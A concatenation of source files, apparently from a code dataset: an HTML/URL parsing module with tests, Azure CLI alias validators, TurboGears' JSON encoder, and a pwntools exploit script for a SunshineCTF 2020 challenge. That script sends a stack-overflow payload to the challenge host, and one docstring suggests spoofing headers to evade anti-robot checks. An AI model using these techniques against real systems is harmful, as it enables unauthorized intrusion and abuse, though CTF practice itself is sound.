temp = urlextract(item.attrs['style'], siteurl, 'text/css')
# Offset indices and add to ans.
for j in range(len(temp)):
temp[j].start += item.value_pos['style'][0]
temp[j].end += item.value_pos['style'][0]
ans += temp
for (a, b) in _URL_TAGS:
if item.name.startswith(a) and b in list(item.attrs.keys()):
# Got one URL.
url = item.attrs[b]
# FIXME: Some HTML tag wants a URL list, look up which
# tag and make it a special case.
(start, end) = item.value_pos[b]
tag_name = a
tag_attr = b
tag_attrs = item.attrs
tag_index = i
tag = URLMatch(doc, start, end, siteurl, True, False, \
tag_attr, tag_attrs, tag_index, tag_name)
ans.append(tag)
# End of 'text/html' mimetype case.
else:
raise ValueError('unknown MIME type: ' + repr(mimetype))
# Filter the answer, removing duplicate matches.
start_end_map = {}
filtered_ans = []
for item in ans:
if (item.start, item.end) not in start_end_map:
start_end_map[(item.start, item.end)] = None
filtered_ans.append(item)
return filtered_ans
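def _example_urlextract_positions():
    """
    Illustrative sketch (not part of the original module): when no
    C{siteurl} is given, every L{URLMatch} C{.url} is exactly the document
    slice between its C{.start} and C{.end} indices.
    """
    doc = '<img src="a.gif"><a href="www.google.com">'
    for match in urlextract(doc):
        assert doc[match.start:match.end] == match.url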
def _tuple_replace(s, Lindices, Lreplace):
"""
Replace slices of a string with new substrings.
Given a list of slice tuples in C{Lindices}, replace each slice
in C{s} with the corresponding replacement substring from
C{Lreplace}.
Example:
>>> _tuple_replace('0123456789',[(4,5),(6,9)],['abc', 'def'])
'0123abc5def9'
"""
ans = []
Lindices = Lindices[:]
Lindices.sort()
if len(Lindices) != len(Lreplace):
raise ValueError('lists differ in length')
for i in range(len(Lindices) - 1):
if Lindices[i][1] > Lindices[i + 1][0]:
raise ValueError('tuples overlap')
if Lindices[i][1] < Lindices[i][0]:
raise ValueError('invalid tuple')
if min(Lindices[i][0], Lindices[i][1]) < 0 or \
max(Lindices[i][0], Lindices[i][1]) >= len(s):
raise ValueError('bad index')
j = 0
offset = 0
for i in range(len(Lindices)):
len1 = Lindices[i][1] - Lindices[i][0]
len2 = len(Lreplace[i])
ans.append(s[j:Lindices[i][0] + offset])
ans.append(Lreplace[i])
j = Lindices[i][1]
ans.append(s[j:])
return ''.join(ans)
def _test_tuple_replace():
"""
Unit test for L{_tuple_replace}.
"""
assert _tuple_replace('', [], []) == ''
assert _tuple_replace('0123456789', [], []) == '0123456789'
assert _tuple_replace('0123456789', [(4, 5), (6, 9)], ['abc', 'def']) == \
'0123abc5def9'
assert _tuple_replace('01234567890123456789', \
[(1, 9), (13, 14), (16, 18)], ['abcd', 'efg', 'hijk']) == \
'0abcd9012efg45hijk89'
def urljoin(s, L):
"""
Write back document with modified URLs (reverses L{urlextract}).
Given a list C{L} of L{URLMatch} objects obtained from
L{urlextract}, substitutes changed URLs into the original
document C{s}, and returns the modified document.
One should only modify the C{.url} attribute of the L{URLMatch}
objects. The ordering of the URLs in the list is not important.
>>> doc = '<img src="a.png"><a href="b.png">'
>>> L = urlextract(doc)
>>> L[0].url = 'foo'
>>> L[1].url = 'bar'
>>> urljoin(doc, L)
'<img src="foo"><a href="bar">'
"""
return _tuple_replace(s, [(x.start, x.end) for x in L], \
[x.url for x in L])
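def _example_urljoin_rewrite():
    """
    Illustrative sketch (not part of the original module): rewrite the
    extracted URLs (here with an arbitrary 'static/' prefix) and substitute
    them back into the document with L{urljoin}.
    """
    doc = '<img src="a.png"><a href="b.png">'
    matches = urlextract(doc)
    for match in matches:
        match.url = 'static/' + match.url
    assert urljoin(doc, matches) == \
        '<img src="static/a.png"><a href="static/b.png">'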
def examples():
"""
Examples of the C{htmldata} module.
Example 1:
Print all absolutized URLs from Google.
Here we use L{urlextract} to obtain all URLs in the document.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> for u in htmldata.urlextract(contents, url):
... print u.url
...
http://www.google.com/images/logo.gif
http://www.google.com/search
(More output)
Note that the second argument to L{urlextract} causes the
URLs to be made absolute with respect to that base URL.
Example 2:
Print all image URLs from Google in relative form.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> for u in htmldata.urlextract(contents):
... if u.tag_name == 'img':
... print u.url
...
/images/logo.gif
Equivalently, one can use L{tagextract}, and look for occurrences
of C{<img>} tags. The L{urlextract} function is mostly a convenience
function for when one wants to extract and/or modify all URLs in a
document.
Example 3:
Replace all C{<a href>} links on Google with the Microsoft web page.
Here we use L{tagextract} to turn the HTML into a data structure,
and then loop over the in-order list of tags (items which are not
tuples are plain text, which is ignored).
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> L = htmldata.tagextract(contents)
>>> for item in L:
... if isinstance(item, tuple) and item[0] == 'a':
... # It's an HTML <a> tag! Give it an href=.
... item[1]['href'] = 'http://www.microsoft.com/'
...
>>> htmldata.tagjoin(L)
(Microsoftized version of Google)
Example 4:
Make all URLs on an HTML document be absolute.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> htmldata.urljoin(htmldata.urlextract(contents, url))
(Google HTML page with absolute URLs)
Example 5:
Properly quote all HTML tag values for pedants.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> htmldata.tagjoin(htmldata.tagextract(contents))
(Properly quoted version of the original HTML)
Example 6:
Modify all URLs in a document so that they are appended
to our proxy CGI script C{http://mysite.com/proxy.cgi}.
>>> import urllib2, htmldata
>>> url = 'http://www.google.com/'
>>> contents = urllib2.urlopen(url).read()
>>> proxy_url = 'http://mysite.com/proxy.cgi?url='
>>> L = htmldata.urlextract(contents)
>>> for u in L:
... u.url = proxy_url + u.url
...
>>> htmldata.urljoin(L)
(Document with all URLs wrapped in our proxy script)
Example 7:
Download all images from a website.
>>> import urllib, htmldata, time
>>> url = 'http://www.google.com/'
>>> contents = urllib.urlopen(url).read()
>>> for u in htmldata.urlextract(contents, url):
... if u.tag_name == 'img':
... filename = urllib.quote_plus(u.url)
... urllib.urlretrieve(u.url, filename)
... time.sleep(0.5)
...
(Images are downloaded to the current directory)
Many sites will protect against bandwidth-draining robots by
checking the HTTP C{Referer} [sic] and C{User-Agent} fields.
To circumvent this, one can create a C{urllib2.Request} object
with a legitimate C{Referer} and a C{User-Agent} such as
C{"Mozilla/4.0 (compatible; MSIE 5.5)"}. Then use
C{urllib2.urlopen} to download the content. Be warned that some
website operators will respond to rapid robot requests by banning
the offending IP address.
"""
print(examples.__doc__)
class URLMatch:
"""
A matched URL inside an HTML document or stylesheet.
A list of C{URLMatch} objects is returned by L{urlextract}.
@ivar url: URL extracted.
@ivar start: Starting character index.
@ivar end: End character index.
@ivar in_html: C{True} if URL occurs within an HTML tag.
@ivar in_css: C{True} if URL occurs within a stylesheet.
@ivar tag_attr: Specific tag attribute in which URL occurs.
Example: C{'href'}.
C{None} if the URL does not occur within an HTML
tag.
@ivar tag_attrs: Dictionary of all tag attributes and values.
Example: C{{'src':'http://X','alt':'Img'}}.
C{None} if the URL does not occur within an HTML
tag.
@ivar tag_index: Index of the tag in the list that would be
generated by a call to L{tagextract}.
@ivar tag_name: HTML tag name in which URL occurs.
Example: C{'img'}.
C{None} if the URL does not occur within an HTML
tag.
"""
def __init__(self, doc, start, end, siteurl, in_html, in_css,
tag_attr=None, tag_attrs=None, tag_index=None,
tag_name=None):
"""
Create a URLMatch object.
"""
self.doc = doc
self.start = start
self.end = end
self.url = doc[start:end]
self.in_html = in_html
self.in_css = in_css
if siteurl != None:
self.url = urllib.parse.urljoin(siteurl, self.url)
self.tag_attr = tag_attr
self.tag_attrs = tag_attrs
self.tag_index = tag_index
self.tag_name = tag_name
def _cast_to_str(arg, str_class):
"""
Casts string components of several data structures to str_class.
Casts string, list of strings, or list of tuples (as returned by
L{tagextract}) such that all strings are made to type str_class.
"""
if _is_str(arg):
return str_class(arg)
elif isinstance(arg, list):
ans = []
for item in arg:
if _is_str(item):
ans.append(str_class(item))
elif isinstance(item, tuple) and len(item) == 2:
(a, b) = item
b_prime = {}
for (b_key, b_value) in list(b.items()):
if b_value is None:
b_prime[str_class(b_key)] = None
else:
b_prime[str_class(b_key)] = str_class(b_value)
ans.append((str_class(a), b_prime))
else:
raise ValueError('unknown argument type')
return ans
else:
raise ValueError('unknown argument type')
# -------------------------------------------------------------------
# Unit Tests: HTML <-> Data structure
# -------------------------------------------------------------------
def _test_tagextract(str_class=str):
"""
Unit tests for L{tagextract} and L{tagjoin}.
Strings are cast to the string class argument str_class.
"""
# Work around lack of nested scopes in Python <= 2.1.
def f(obj, str_class2=str_class):
return _cast_to_str(obj, str_class2)
# Simple HTML document to test.
doc1 = f('\n\n<Html><BODY bgcolor=#ffffff>Hi<h1>Ho</h1><br>' +
'<br /><img SRc="text%5f.gif"><TAG NOshow>' +
'<img test="5%ff" /></body></html>\nBye!\n')
doc2 = f('\r<HTML><!-- Comment<a href="blah"> --><hiYa><foo>' +
'<test tag="5" content=6><is broken=False><yay>' +
'<style><><>><</style><foo bar=5>end<!-- <!-- nested --> ' +
'<script language="JavaScript"><>!><!_!_!-->!_-></script>')
doc3 = f('\r\t< html >< tag> <!--comment--> <tag a = 5> ' +
'<foo \r\nbg = val text \t= "hi you" name\t e="5"\t\t\t\n>')
doc4 = f('<?xml ??><foo><!-- <img> --><!DOCTYPE blah""/>' +
'<![CDATA[ more and weirder<bar> ] ][]]><![C[DATA[[>' +
'<abc key=value><![CDATA[to eof')
doc5 = f('<a href="foobar/ \t="base="10" x="15"><a x="9"t="20">')
# -----------------------------------------------------------------
# Test _html_split()
# -----------------------------------------------------------------
s = doc1
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['\n\n', '<Html>', '<BODY bgcolor=#ffffff>', 'Hi', '<h1>', 'Ho',
'</h1>', '<br>', '<br />', '<img SRc="text%5f.gif">',
'<TAG NOshow>', '<img test="5%ff" />', '</body>', '</html>',
'\nBye!\n'])
s = doc2
assert s == f('').join(_html_split(s))
# Test single quotes
s = doc2.replace(f('"'), f("'"))
assert s == f('').join(_html_split(s))
s = f('<!-- test weird comment <body> <html> --> <h1>Header' +
'</h1 value=10 a=11>')
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['<!-- test weird comment <body> <html> -->', ' ',
'<h1>', 'Header', '</h1 value=10 a=11>'])
s = f('<!-- <!-- nested messed up --> blah ok <now> what<style>hi' +
'<><>></style><script language="Java"><aL><>><>></script>a')
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['<!-- <!-- nested messed up -->', ' blah ok ', '<now>',
' what', '<style>', 'hi<><>>', '</style>',
'<script language="Java">', '<aL><>><>>', '</script>', 'a'])
s = f('<!-- ><# -->!<!-!._-><!-- aa--> <style><tag//</style> <tag ' +
'<tag <! <! -> <!-- </who< <who> tag> <huh-->-</style>' +
'</style<style>')
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['<!-- ><# -->', '!', '<!-!._->', '<!-- aa-->',
' ', '<style>', '<tag//', '</style>', ' ', '<tag <tag <! <! ->',
' ', '<!-- </who< <who> tag> <huh-->', '-', '</style>',
'</style<style>'])
s = doc4
assert s == f('').join(_html_split(s))
assert _html_split(s) == f(
['<?xml ??>', '<foo>', '<!-- <img> -->', '<!DOCTYPE blah""/>',
'<![CDATA[ more and weirder<bar> ] ][]]>', '<![C[DATA[[>',
'<abc key=value>', '<![CDATA[to eof'])
# -----------------------------------------------------------------
# Test tagextract() and tagjoin()
# -----------------------------------------------------------------
# Test for whitespace handling in tags.
assert (tagextract('<a\n\t\t\t\v\rhref="a.png"\tsize=10>') ==
[('a', {'href': 'a.png', 'size': '10'})])
s = doc1
s2 = doc1.replace(f('"'), f("'")) # Test single quotes, too.
assert tagextract(f('')) == []
assert tagextract(s) == tagextract(s2) == \
f(['\n\n', ('html', {}), ('body', {'bgcolor': '#ffffff'}),
'Hi', ('h1', {}), 'Ho', ('/h1', {}), ('br', {}),
('br/', {}), ('img', {'src': 'text%5f.gif'}),
('tag', {'noshow': None}), ('img/', {'test': '5%ff'}),
('/body', {}), ('/html', {}), '\nBye!\n'])
s2 = f('\n\n<html><body bgcolor="#ffffff">Hi<h1>Ho</h1><br>' +
'<br /><img src="text%5f.gif"><tag noshow>' +
'<img test="5%ff" /></body></html>\nBye!\n')
assert tagjoin(tagextract(s)) == s2
doc2old = doc2
doc2 = f('\r<HTML><!-- Comment<a href="blah"> --><hiYa><foo>' +
'<test tag="5" content=6><is broken=False><yay>' +
'<style><><>><</style><foo bar=5>end<!-- <!-- nested --> ' +
'<script language="JavaScript"><>!><!_!_!-->!_-></script>')
assert doc2old == doc2
s = doc2
assert tagextract(s) == f(
['\r', ('html', {}), ('!-- Comment<a href="blah"> --', {}),
('hiya', {}), ('foo', {}),
('test', {'content': '6', 'tag': '5'}),
('is', {'broken': 'False'}), ('yay', {}), ('style', {}), '<><>><',
('/style', {}), ('foo', {'bar': '5'}), 'end',
('!-- <!-- nested --', {}), ' ',
('script', {'language': 'JavaScript'}), ('>!><!_!_!-->!_-', {}),
('/script', {})])
assert tagjoin(tagextract(s)) == f(
'\r<html><!-- Comment<a href="blah"> --><hiya><foo><test ' +
'content="6" tag="5"><is broken="False"><yay><style><><>><' +
'</style><foo bar="5">end<!-- <!-- nested --> ' +
'<script language="JavaScript"><>!><!_!_!-->!_-></script>')
s = doc5
assert tagextract(s) == f(
[('a', {'href':'foobar/ \t=', 'base':'10', 'x':'15'}),
('a', {'x':'9', 't':'20'})])
assert tagjoin(tagextract(s)) == f(
'<a base="10" href="foobar/ \t=" x="15"><a t="20" x="9">')
# -----------------------------------------------------------------
# Test _full_tag_extract()
# -----------------------------------------------------------------
for s in [doc1, doc2, doc3,
doc1.replace(f('"'), f("'")), doc2.replace(f('"'), f("'")),
doc3.replace(f('"'), f("'"))]:
L = _full_tag_extract(s)
for (i, item) in _enumerate(L):
if isinstance(item, _HTMLTag):
for key in list(item.attrs.keys()):
assert s[item.key_pos[key][0]:item.key_pos[key][1]].lower()\
== key
if item.attrs[key] != None:
assert s[item.value_pos[key][0]:item.value_pos[key][1]] \
== item.attrs[key]
n = 1000
doc4 = f('<tag name = "5" value ="6afdjherknc4 cdk j" a="7" b=8/>')
doc4 *= n
L = tagextract(doc4)
assert len(L) == n
for i in range(n):
assert L[i] == f([('tag/', {'name':'5', 'value':'6afdjherknc4 cdk j',
'a':'7', 'b':'8'})])[0]
# -----------------------------------------------------------------
# Test tagextract() and tagjoin() with XML directives.
# -----------------------------------------------------------------
doc1 = f(
'a<?xml version="1.0"?>' +
'b<!DOCTYPE html' +
'PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"' +
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >c' +
'<html a=b><!-- Comment <><> hi! -->' +
'z<![CDATA[ some content ]]>rx' +
'<![C[DATA[ more and weirder ] ][]]>tt')
doc1join = f(
'a<?xml version="1.0"?>b<!DOCTYPE htmlPUBLIC "-//W3C//DTD ' +
'XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/' +
'xhtml1-transitional.dtd">c<html a="b"><!-- Comment <><> hi! ' +
'-->z<![CDATA[ some content ]]>rx<![C[DATA[ more and weirder ]' +
' ][]]>tt')
ans1 = f(
['a', ('?xml version="1.0"?', {}), 'b',
('!DOCTYPE html' +
'PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"' +
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"', {}),
'c', ('html', {'a':'b'}), ('!-- Comment <><> hi! --', {}), 'z',
('![CDATA[ some content ]]', {}), 'rx',
('![C[DATA[ more and weirder ] ][]]', {}), 'tt'])
assert (tagextract(f('<?xml version="1.0" encoding="utf-8" ?>')) ==
f([('?xml version="1.0" encoding="utf-8" ?', {})]))
assert (tagextract(f('<!DOCTYPE html PUBLIC etc...>')) ==
f([('!DOCTYPE html PUBLIC etc...', {})]))
assert tagextract(doc1) == ans1
assert tagjoin(tagextract(doc1)) == doc1join
# -------------------------------------------------------------------
# Unit Tests: URL Parsing
# -------------------------------------------------------------------
def _test_urlextract(str_class=str):
"""
Unit tests for L{urlextract} and L{urljoin}.
Strings are cast to the string class argument str_class.
"""
# Work around lack of nested scopes in Python <= 2.1.
def f(obj, str_class2=str_class):
return _cast_to_str(obj, str_class2)
doc1 = f('urlblah, url ( blah2, url( blah3) url(blah4) ' +
'url("blah5") hum("blah6") url)"blah7"( url ( " blah8 " );;')
doc2 = f('<html><img src="a.gif" alt="b"><a href = b.html name=' +
'"c"><td background = ./c.png width=100%><a value=/f.jpg>' +
'<img src="http://www.abc.edu/d.tga">http://www.ignore.us/' +
'\nhttp://www.nowhere.com <style>url(h.gif) ' +
'url(http://www.testdomain.com/) http://ignore.com/a' +
'</style><img alt="c" src = "a.gif"><img src=/i.png>')
doc3 = f('@import foo;\n@import bar\n@import url(\'foo2\');' +
'@import url(\'http://bar2\')\n@import\turl("foo!");' +
'@import \'foo3\'\n@import "bar3";\n@importfails;' +
'@import;@import\n;url(\'howdy!\')\n@import foo5 ;' +
'@import \'foo6\' \n@import "foo7";')
doc4 = f('@import foo handheld;\n@import \'bar\' handheld\n' +
'@import url(\'foo2\') handheld; @import url(bar2) ha\n' +
'@import url("foo3") handheld\n')
doc5 = f('<html><img src="a.gif" alt="b" style="url(\'foo\')">' +
'<a href = b.html name="c" style="@import \'bar.css\'">')
doc6 = doc2.replace(f('"'), f("'")) # Test single quotes, too.
# Test CSS.
s = doc1
L = urlextract(s, mimetype='text/css')
L2 = [x.url for x in L]
assert L2 == f([' blah3', 'blah4', 'blah5', ' blah8 '])
assert [s[x.start:x.end] == x.url for x in L].count(False) == 0
# Test CSS more.
s = doc3
L = urlextract(s, mimetype='text/css')
L2 = [x.url for x in L]
assert L2 == f(['foo', 'bar', 'foo2', 'http://bar2', 'foo!',
'foo3', 'bar3', 'howdy!', 'foo5', 'foo6', 'foo7'])
assert [s[x.start:x.end] == x.url for x in L].count(False) == 0
# Test CSS even more.
s = doc4
L = urlextract(s, mimetype='text/css')
L2 = [x.url for x in L]
assert L2 == f(['foo', 'bar', 'foo2', 'bar2', 'foo3'])
assert [s[x.start:x.end] == x.url for x in L].count(False) == 0
# Test HTML.
s = doc2
L = urlextract(s)
L2 = [x.url for x in L]
L3 = [x.url for x in urlextract(doc6)]
ans = f(['a.gif', 'b.html', './c.png',
'http://www.abc.edu/d.tga', 'h.gif',
'http://www.testdomain.com/', 'a.gif', '/i.png'])
assert L2 == L3 == ans
for i in range(len(L)):
assert s[L[i].start:L[i].end] == L[i].url
# Test HTML more.
n = 100
s2 = s * n
L3 = urlextract(s2)
L4 = [x.url for x in L3]
assert L4 == L2 * n
for i in range(len(L3)):
assert s2[L3[i].start:L3[i].end] == L3[i].url
# Test HTML w/ siteurl.
base = f('http://www.python.org/~guido/')
L = urlextract(s, base)
L2 = [x.url for x in L]
assert L2 == [urllib.parse.urljoin(base, x) for x in ans]
# Test urljoin().
assert urljoin(doc1, urlextract(doc1, mimetype='text/css')) == doc1
assert urljoin(doc2, urlextract(doc2)) == doc2
s = doc2
L = urlextract(s)
L[3].url = f('FOO')
L[5].url = f('BAR')
L[7].url = f('F00!')
assert urljoin(s, L) == f(
'<html><img src="a.gif" alt="b"><a href = b.html name="c">' +
'<td background = ./c.png width=100%><a value=/f.jpg>' +
'<img src="FOO">http://www.ignore.us/\nhttp://www.nowhere.com ' +
'<style>url(h.gif) url(BAR) http://ignore.com/a</style>' +
'<img alt="c" src = "a.gif"><img src=F00!>')
# Test HTML yet more.
s = doc5
L = urlextract(s)
L2 = [x.url for x in L]
assert L2 == f(['foo', 'a.gif', 'bar.css', 'b.html'])
assert [s[x.start:x.end] == x.url for x in L].count(False) == 0
# -------------------------------------------------------------------
# Unit Test Main Routine
# -------------------------------------------------------------------
def _test():
"""
Unit test main routine.
"""
print('Unit tests:')
_test_remove_comments()
print(' _remove_comments: OK')
_test_shlex_split()
print(' _shlex_split: OK')
_test_tag_dict()
print(' _tag_dict: OK')
_test_tuple_replace()
print(' _tuple_replace: OK')
_test_tagextract()
print(' tagextract*: OK')
_test_tagextract(str)
print(' tagextract (unicode)*: OK')
_test_urlextract()
print(' urlextract*: OK')
_test_urlextract(str)
print(' urlextract (unicode)*: OK')
print()
print('* The corresponding join method has been tested as well.')
if __name__ == '__main__':
_test()
|
src/alias/azext_alias/_validators.py
|
Mannan2812/azure-cli-extensions
| 207 |
79151
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import re
import shlex
from knack.util import CLIError
import azext_alias
from azext_alias.argument import get_placeholders
from azext_alias.util import (
get_config_parser,
is_url,
reduce_alias_table,
filter_alias_create_namespace,
retrieve_file_from_url
)
from azext_alias._const import (
COLLISION_CHECK_LEVEL_DEPTH,
INVALID_ALIAS_COMMAND_ERROR,
EMPTY_ALIAS_ERROR,
INVALID_STARTING_CHAR_ERROR,
INCONSISTENT_ARG_ERROR,
COMMAND_LVL_ERROR,
CONFIG_PARSING_ERROR,
ALIAS_FILE_NOT_FOUND_ERROR,
ALIAS_FILE_DIR_ERROR,
FILE_ALREADY_EXISTS_ERROR,
ALIAS_FILE_NAME
)
from azext_alias.alias import AliasManager
def process_alias_create_namespace(namespace):
"""
Validate input arguments when the user invokes 'az alias create'.
Args:
namespace: argparse namespace object.
"""
namespace = filter_alias_create_namespace(namespace)
_validate_alias_name(namespace.alias_name)
_validate_alias_command(namespace.alias_command)
_validate_alias_command_level(namespace.alias_name, namespace.alias_command)
_validate_pos_args_syntax(namespace.alias_name, namespace.alias_command)
def process_alias_import_namespace(namespace):
"""
Validate input arguments when the user invokes 'az alias import'.
Args:
namespace: argparse namespace object.
"""
if is_url(namespace.alias_source):
alias_source = retrieve_file_from_url(namespace.alias_source)
_validate_alias_file_content(alias_source, url=namespace.alias_source)
else:
namespace.alias_source = os.path.abspath(namespace.alias_source)
_validate_alias_file_path(namespace.alias_source)
_validate_alias_file_content(namespace.alias_source)
def process_alias_export_namespace(namespace):
"""
Validate input arguments when the user invokes 'az alias export'.
Args:
namespace: argparse namespace object.
"""
namespace.export_path = os.path.abspath(namespace.export_path)
if os.path.isfile(namespace.export_path):
raise CLIError(FILE_ALREADY_EXISTS_ERROR.format(namespace.export_path))
export_path_dir = os.path.dirname(namespace.export_path)
if not os.path.isdir(export_path_dir):
os.makedirs(export_path_dir)
if os.path.isdir(namespace.export_path):
namespace.export_path = os.path.join(namespace.export_path, ALIAS_FILE_NAME)
def _validate_alias_name(alias_name):
"""
Check if the alias name is valid.
Args:
alias_name: The name of the alias to validate.
"""
if not alias_name:
raise CLIError(EMPTY_ALIAS_ERROR)
if not re.match('^[a-zA-Z]', alias_name):
raise CLIError(INVALID_STARTING_CHAR_ERROR.format(alias_name[0]))
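def _example_validate_alias_name():
    """
    Illustrative sketch (not part of the original extension): alias names
    must be non-empty and start with a letter.
    """
    _validate_alias_name('deploy')      # accepted
    try:
        _validate_alias_name('2fast')   # rejected: starts with a digit
    except CLIError:
        pass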
def _validate_alias_command(alias_command):
"""
Check if the alias command is valid.
Args:
alias_command: The command to validate.
"""
if not alias_command:
raise CLIError(EMPTY_ALIAS_ERROR)
split_command = shlex.split(alias_command)
boundary_index = len(split_command)
for i, subcommand in enumerate(split_command):
if not re.match('^[a-z]', subcommand.lower()) or i > COLLISION_CHECK_LEVEL_DEPTH:
boundary_index = i
break
# Extract possible CLI commands and validate
command_to_validate = ' '.join(split_command[:boundary_index]).lower()
for command in azext_alias.cached_reserved_commands:
if re.match(r'([a-z\-]*\s)*{}($|\s)'.format(command_to_validate), command):
return
_validate_positional_arguments(shlex.split(alias_command))
def _validate_pos_args_syntax(alias_name, alias_command):
"""
Check if the positional argument syntax is valid in alias name and alias command.
Args:
alias_name: The name of the alias to validate.
alias_command: The command to validate.
"""
pos_args_from_alias = get_placeholders(alias_name)
# Split by '|' to extract positional argument name from Jinja filter (e.g. {{ arg_name | upper }})
# Split by '.' to extract positional argument name from function call (e.g. {{ arg_name.split()[0] }})
pos_args_from_command = [x.split('|')[0].split('.')[0].strip() for x in get_placeholders(alias_command)]
if set(pos_args_from_alias) != set(pos_args_from_command):
arg_diff = set(pos_args_from_alias) ^ set(pos_args_from_command)
raise CLIError(INCONSISTENT_ARG_ERROR.format('' if len(arg_diff) == 1 else 's',
arg_diff,
'is' if len(arg_diff) == 1 else 'are'))
def _validate_alias_command_level(alias, command):
"""
Make sure that if the alias is a reserved command, the command that the alias points to
in the command tree does not conflict in levels.
e.g. 'dns' -> 'network dns' is valid because dns is a level 2 command and network dns starts at level 1.
However, 'list' -> 'show' is not valid because list and show are both reserved commands at level 2.
Args:
alias: The name of the alias.
command: The command that the alias points to.
"""
alias_collision_table = AliasManager.build_collision_table([alias])
# Alias is not a reserved command, so it can point to any command
if not alias_collision_table:
return
command_collision_table = AliasManager.build_collision_table([command])
alias_collision_levels = alias_collision_table.get(alias.split()[0], [])
command_collision_levels = command_collision_table.get(command.split()[0], [])
# Check if there is a command level conflict
if set(alias_collision_levels) & set(command_collision_levels):
raise CLIError(COMMAND_LVL_ERROR.format(alias, command))
def _validate_alias_file_path(alias_file_path):
"""
    Make sure the alias file path is neither non-existent nor a directory.
    Args:
        alias_file_path: The alias file path to import aliases from.
"""
if not os.path.exists(alias_file_path):
raise CLIError(ALIAS_FILE_NOT_FOUND_ERROR)
if os.path.isdir(alias_file_path):
raise CLIError(ALIAS_FILE_DIR_ERROR.format(alias_file_path))
def _validate_alias_file_content(alias_file_path, url=''):
"""
    Make sure the alias names and alias commands in the alias file are in a valid format.
    Args:
        alias_file_path: The alias file path to import aliases from.
"""
alias_table = get_config_parser()
try:
alias_table.read(alias_file_path)
for alias_name, alias_command in reduce_alias_table(alias_table):
_validate_alias_name(alias_name)
_validate_alias_command(alias_command)
_validate_alias_command_level(alias_name, alias_command)
_validate_pos_args_syntax(alias_name, alias_command)
except Exception as exception: # pylint: disable=broad-except
error_msg = CONFIG_PARSING_ERROR % AliasManager.process_exception_message(exception)
error_msg = error_msg.replace(alias_file_path, url or alias_file_path)
raise CLIError(error_msg)
def _validate_positional_arguments(args):
"""
To validate the positional argument feature - https://github.com/Azure/azure-cli/pull/6055.
    Assume that any unknown trailing tokens are positional arguments, and that
    the subcommand words preceding them appear at the end of a reserved command.
Slight modification of
https://github.com/Azure/azure-cli/blob/dev/src/azure-cli-core/azure/cli/core/commands/__init__.py#L356-L373
Args:
args: The arguments that the user inputs in the terminal.
    Raises:
        CLIError: If the arguments do not correspond to any reserved command.
"""
nouns = []
for arg in args:
        if not arg.startswith('-') and not arg.startswith('{{'):
nouns.append(arg)
else:
break
while nouns:
search = ' '.join(nouns)
# Since the command name may be immediately followed by a positional arg, strip those off
if not next((x for x in azext_alias.cached_reserved_commands if x.endswith(search)), False):
del nouns[-1]
else:
return
raise CLIError(INVALID_ALIAS_COMMAND_ERROR.format(' '.join(args)))
|
sunshinectf2020/speedrun/exploit_00.py
|
nhtri2003gmail/ctf-write-ups
| 101 |
79209
|
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./chall_00')
if not args.REMOTE:
p = process(binary.path)
else:
p = remote('chal.2020.sunshinectf.org', 30000)
payload = b''
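# Assumption (offsets inferred from the payload below, not from the binary):
# the vulnerable read fills a stack buffer at ebp-0x48 while a 32-bit local
# at ebp-0xc is compared against 0xfacade, so (0x48 - 0xc) bytes of padding
# reach that local and the next dword overwrites it.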
payload += (0x48 - 0xc) * b'A'
payload += p32(0xfacade)
p.sendlineafter('This is the only one\n',payload)
p.interactive()
|
tg/jsonify.py
|
sergiobrr/tg2
| 812 |
79244
|
"""JSON encoding functions."""
import datetime
import decimal
import types
from json import JSONEncoder as _JSONEncoder
from tg.support.converters import asbool
from webob.multidict import MultiDict
from tg._compat import string_type
from tg.configuration.utils import GlobalConfigurable
from tg.util.sqlalchemy import dictify as dictify_sqla, is_saobject, is_query_result, is_query_row
from tg.util.ming import dictify as dictify_ming, is_mingobject, is_objectid
import logging
log = logging.getLogger(__name__)
class JsonEncodeError(Exception):
"""JSON Encode error"""
class JSONEncoder(_JSONEncoder, GlobalConfigurable):
"""TurboGears custom JSONEncoder.
Provides support for encoding objects commonly used in TurboGears apps, like:
- SQLAlchemy queries
- Ming queries
- Dates
- Decimals
- Generators
Support for additional types is provided through the ``__json__`` method
that will be called on the object by the JSONEncoder when provided and through
the ability to register custom encoder for specific types using
:meth:`.JSONEncoder.register_custom_encoder`.
"""
CONFIG_NAMESPACE = 'json.'
CONFIG_OPTIONS = {'isodates': asbool,
'allow_lists': asbool}
def __init__(self, **kwargs):
self._registered_types_map = {}
self._registered_types_list = tuple()
kwargs = self.configure(**kwargs)
super(JSONEncoder, self).__init__(**kwargs)
def configure(self, isodates=False, custom_encoders=None, allow_lists=False, **kwargs):
"""JSON encoder can be configured through :class:`.ApplicationConfigurator`
(``app_cfg.base_config``) using the following options:
- ``json.isodates`` -> encode dates using ISO8601 format
- ``json.custom_encoders`` -> List of tuples ``(type, encode_func)`` to register
custom encoders for specific types.
- ``json.allow_lists`` -> Allows lists to be encoded, this is usually disabled for
security reasons due to JSON hijacking. See http://stackoverflow.com/questions/16289894
for additional details.
"""
self._isodates = isodates
self._allow_lists = allow_lists
if custom_encoders is not None:
for type_, encoder in custom_encoders.items():
self.register_custom_encoder(type_, encoder)
return kwargs
def register_custom_encoder(self, objtype, encoder):
"""Register a custom encoder for the given type.
Instead of using standard behavior for encoding the given type to JSON, the
``encoder`` will used instead. ``encoder`` must be a callable that takes
